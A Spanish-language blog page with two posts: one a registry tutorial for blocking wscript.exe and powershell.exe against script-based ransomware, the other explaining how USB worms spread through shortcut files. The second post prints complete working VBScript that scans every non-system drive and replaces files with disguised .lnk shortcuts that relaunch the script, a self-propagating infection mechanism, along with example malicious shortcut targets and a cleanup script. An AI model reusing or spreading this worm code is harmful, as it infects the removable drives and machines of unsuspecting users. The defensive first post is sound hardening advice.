jueves, 8 de septiembre de 2016

Como Protegernos De los Ransomware Virus VBScript y Javascript

Ahora le enseñare como evitar ser victima de los ransomware y virus que se ejecutan con las extensiones VBS y JS, para eso evitaremos que se ejecute el archivo Wscript.exe que es un archivo que trae incorporado windows por defecto pero que muchas personas no lo necesitan, así que sino lo necesitan pues lo bloqueamos.

para eso primero presionamos la tecla Windows+r y tecleamos regedit para luego dar clic en aceptar





de nuevo damos clic en aceptar para otorgar permisos de administrador y nos parecerá lo siguiente




como verán tiene una apariencia ramificada,estas ramas se llaman claves del registro y nos iremos ala clave llamada   HKEY_LOCAL_MACHINE y se mostrara así



si observan se expandio ahora nos iremos ala clave llamada SOFTWARE y se expandirá de nuevo y después a Microsoft luego a Windows Script Host y por ultimo a Settings

ya que estemos hay crearemos un nuevo valor llamado Enabled dando clic derecho y nuevo valor de cadena



ahora que ya lo hemos creado y puesto el nombre Enabled, daremos doble clic en el y le pondremos como valor el 0 y por ultimo damos aceptar



para que se efectúen los cambios no es necesario reiniciar la maquina, si intentan ejecutar un archivo con la extencion VBS o JS les mostrara el siguiente mensaje




primer objetivo hecho pero queda otro bloquear el powershell ya que un compañero del foro demostró que se puede descargar un archivo .EXE desde Internet y ejecutarlo.

y por otra parte no sirve de nada ejecutar estas lineas en el símbolo del sistema como administrador

powershell Set-ExecutionPolicy Restricted

ya que solo restringen los script PS1 de powershell, pero como dice en la pagina de microsoft que se puede usar en modo interactivo leerlo aqui: https://technet.microsoft.com/en-us/library/ee176961.aspx


bueno así que para bloquear este archivo nos iremos ala siguiente ruta del registro

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies

ya que estamos aquí crearemos una nueva clave de registro llamada Explorer y si la tienen es mejor no es necesario crearla.

ahora crearemos un nuevo valor REG_DWORD así






y lo llamaremos DisallowRun ahora daremos doble clic en el y como valor le pondremos el 1



y damos aceptar.

después crearemos una clave llamada DisallowRun 





para luego que darnos así




dentro de ella crearemos 2  nuevo valores de cadena




al primero lo llamaremos 1 y al segundo 2



ahora al 1 le daremos doble clic y pondremos como valor powershell.exe y damos aceptar


con el 2 hacen lo mismo pero en ves de powershell.exe le ponen wscript.exe esto es por si las dudas jajaja.

después de esto borraremos el powershell de los valores del sistema por que si reiniciamos la maquina desde el símbolo del sistema se sigue ejecutando este programa, así que cerramos el registro y nos dirigimos a

después en configuraciones avanzadas del sistema





después aquí damos clic en variables de entorno



ahora elegimos path  y damos en editar




en la siguiente ventana elegimos la ruta del powershell y damos en modificar, no la eliminaremos ya que si en dado caso la llegaran a ocupar solo revierten los cambios




como modificación yo le agregue 0000 y me quedo así



ahora daremos clic en aceptar en todo y reiniciamos nuestra pc para que surjan los cambios del registro y después de esto no se ejecutara el powershell ni mucho menos los archivos VBS y JS


bueno amigos eso es todo saludos Flamer

miércoles, 7 de septiembre de 2016

Metodo De Ejecucion De Un Malware En Una USB Mediante Acceso Directo

Platicando con un amigo en el foro del el hacker.net de como lograban ejecutarse los virus en la USB para lograr sus objetivos, se me ocurrió otro método casi igual pero con la diferencia de que este no usa el cmd /c para ejecutar el script sino que usa parámetros, pero primero vamos a ver como funcionan la infeccion.

los virus en la actualidad que se propagan por usb crean varios accesos directos en ellas para propagarse, pero se preguntaran ¿para que sirven estos accesos directos? pues bueno ellos modifican la parte del destino del acceso directo que es esta parte




y como destino le ponen lo siguiente ejemplo:

C:\Windows\System32\cmd.exe /c virus.vbs&notas.txt

Nota: Este es solo un ejemplo simple para compararlo después con el mio y la diferencia es que este método muestra la ventana del símbolo del sistema y  el mio no ejemplo:


C:\Windows\System32\wscript.exe  virus.vbs "notas.txt"

para que esto funcione el archivo llamado "virus.vbs" debe de leer los parámetros enviados y ejecutarlos.

bueno aquí les dejo mi código completo que hace lo que explico, por cada archivo crea un acceso directo y al ejecutalo ejecuta de nuevo el script y el archivo asociado a el.

option explicit
dim shell,n,i,u,system,dir,d,f,sf,sb,j,link,b
'on error resume next'
Set shell = createobject("wscript.shell")
Set system = CreateObject("scripting.filesystemobject")

n = wscript.scriptfullname
i = instrrev(n,"\") '"
n = mid(n,i+1,len(n)-i)
u = Shell.ExpandEnvironmentStrings("%SystemDrive%")

if WScript.Arguments.Count <> 0 then
   shell.run chr(34) & WScript.Arguments(0) & chr(34)
end if

Set dir = system.Drives

For each d  in dir
   if d.path<> u and d.IsReady then
      ciclo1(d.path)
   end if
Next

function ciclo1(ruta)
   set f = system.GetFolder(ruta)
   set sf = f.files
   
   For Each j In sf
     if j.type<> "Acceso directo" then
        Set Link = Shell.CreateShortcut(j.path & ".lnk")
        With Link
       .TargetPath = wscript.fullname
          .Arguments = " " & n & " " & chr(34) & mid(j.path,4,len(j.path)) & chr(34)
          .IconLocation = "explorer.exe, 0" 
          .Description = j.type     
          .WorkingDirectory = j.drive
          .Save       
       end with
    end if
   Next

   set b = system.GetFolder(ruta)
   Set sb = b.SubFolders
   
   For Each j In sb
      ciclo1(j.path)
   Next
end function


ahora que ya les llene la usb de archivos lnk, aquí les dejo otro script para que los borren


option explicit
dim shell,system,u,dir,d,f,sf,j,b,sb
Set shell = createobject("wscript.shell")
Set system = CreateObject("scripting.filesystemobject")

u = Shell.ExpandEnvironmentStrings("%SystemDrive%")
Set dir = system.Drives

For each d  in dir
   if d.path<> u and d.IsReady then
      ciclo1(d.path)
   end if
Next

function ciclo1(ruta)
   set f = system.GetFolder(ruta)
   set sf = f.files
   
   For Each j In sf
     if j.type = "Acceso directo" then
        j.Delete
    end if
   Next

   set b = system.GetFolder(ruta)
   Set sb = b.SubFolders
   
   For Each j In sb
      ciclo1(j.path)
   Next
end function


Nota: Me han dicho que los identificadores(las variables) deben de llevar nombres que las identifiquen, ya que tal ves mis lectores no comprendan el programa, asi que les pide otro perdón aparte de mi ortografía pero se me ase mas cómodo programar asi y no batallo en andar inventando nombres para cada variable o función, así que me disculpan en la forma de programar.

saludos Flamer y creo que eso es todo,